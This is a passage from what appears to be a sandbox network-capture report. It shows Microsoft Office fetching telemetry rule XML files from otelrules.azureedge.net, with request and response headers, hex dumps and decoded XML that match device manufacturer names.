                          2024-11-25 16:56:29 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                          Session IDSource IPSource PortDestination IPDestination Port
                          13192.168.2.44976213.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:28 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:29 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:28 GMT
                          Content-Type: text/xml
                          Content-Length: 450
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                          ETag: "0x8DC582BD4C869AE"
                          x-ms-request-id: 97edb58e-001e-00a2-13a4-3ed4d5000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165628Z-178bfbc474bw8bwphC1NYC38b400000007gg00000000mtb9
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:29 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                          Session IDSource IPSource PortDestination IPDestination Port
                          14192.168.2.44976113.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:28 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:29 UTC494INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:29 GMT
                          Content-Type: text/xml
                          Content-Length: 3788
                          Connection: close
                          Vary: Accept-Encoding
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                          ETag: "0x8DC582BAC2126A6"
                          x-ms-request-id: 15799d2c-401e-0047-13c9-3e8597000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165629Z-178bfbc474bw8bwphC1NYC38b400000007p0000000003suc
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:29 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                          Session IDSource IPSource PortDestination IPDestination Port
                          15192.168.2.44976313.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:28 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:29 UTC494INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:29 GMT
                          Content-Type: text/xml
                          Content-Length: 2980
                          Connection: close
                          Vary: Accept-Encoding
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                          ETag: "0x8DC582BA80D96A1"
                          x-ms-request-id: 6b6b0dda-801e-0083-096a-3cf0ae000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165629Z-174c587ffdfb74xqhC1TEBhabc0000000690000000005tqz
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:29 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                          Session IDSource IPSource PortDestination IPDestination Port
                          16192.168.2.44976713.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:30 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:31 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:31 GMT
                          Content-Type: text/xml
                          Content-Length: 415
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                          ETag: "0x8DC582B9F6F3512"
                          x-ms-request-id: 30601852-401e-0047-7476-3b8597000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165631Z-174c587ffdfdwxdvhC1TEB1c4n000000064g00000000ech9
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:31 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                          Session IDSource IPSource PortDestination IPDestination Port
                          17192.168.2.44976613.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:30 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:31 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:31 GMT
                          Content-Type: text/xml
                          Content-Length: 474
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                          ETag: "0x8DC582B9964B277"
                          x-ms-request-id: 65361fd5-201e-0033-283f-3cb167000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165631Z-15b8b599d88tmlzshC1TEB4xpn0000000670000000000sq2
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:31 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                          Session IDSource IPSource PortDestination IPDestination Port
                          18192.168.2.44976813.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:30 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:31 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:31 GMT
                          Content-Type: text/xml
                          Content-Length: 471
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                          ETag: "0x8DC582BB10C598B"
                          x-ms-request-id: ce5ebd39-a01e-0053-183c-3c8603000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165631Z-15b8b599d88s6mj9hC1TEBur3000000005zg00000000hrhz
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:31 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                          Session IDSource IPSource PortDestination IPDestination Port
                          19192.168.2.44976913.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:31 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:31 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:31 GMT
                          Content-Type: text/xml
                          Content-Length: 632
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                          ETag: "0x8DC582BB6E3779E"
                          x-ms-request-id: 5e8702c1-301e-000c-0b8f-3b323f000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165631Z-174c587ffdfdwxdvhC1TEB1c4n000000060000000000znmr
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:31 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                          Session IDSource IPSource PortDestination IPDestination Port
                          20192.168.2.44977013.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:31 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:31 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:31 GMT
                          Content-Type: text/xml
                          Content-Length: 467
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                          ETag: "0x8DC582BA6C038BC"
                          x-ms-request-id: ba9b913e-601e-0001-2f1a-3dfaeb000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165631Z-178bfbc474b9xljthC1NYCtw9400000007m000000000meps
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:31 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                          Session IDSource IPSource PortDestination IPDestination Port
                          21192.168.2.44977313.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:33 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:33 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:33 GMT
                          Content-Type: text/xml
                          Content-Length: 486
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                          ETag: "0x8DC582BB344914B"
                          x-ms-request-id: eb1ded04-b01e-0097-298c-3a4f33000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165633Z-174c587ffdf9xbcchC1TEBxkz4000000062g00000000cs9r
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:33 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                          Session IDSource IPSource PortDestination IPDestination Port
                          22192.168.2.44977213.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:33 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:33 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:33 GMT
                          Content-Type: text/xml
                          Content-Length: 407
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                          ETag: "0x8DC582BBAD04B7B"
                          x-ms-request-id: 239436ba-d01e-0028-7bd5-3b7896000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165633Z-15b8b599d88l2dpthC1TEBmzr0000000063g00000000n11p
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:33 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                          Session IDSource IPSource PortDestination IPDestination Port
                          23192.168.2.44977413.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:33 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:33 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:33 GMT
                          Content-Type: text/xml
                          Content-Length: 427
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                          ETag: "0x8DC582BA310DA18"
                          x-ms-request-id: 08b7745d-b01e-00ab-54e9-3edafd000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165633Z-15b8b599d88tr2flhC1TEB5gk400000006dg0000000038yk
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:33 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                          Session IDSource IPSource PortDestination IPDestination Port
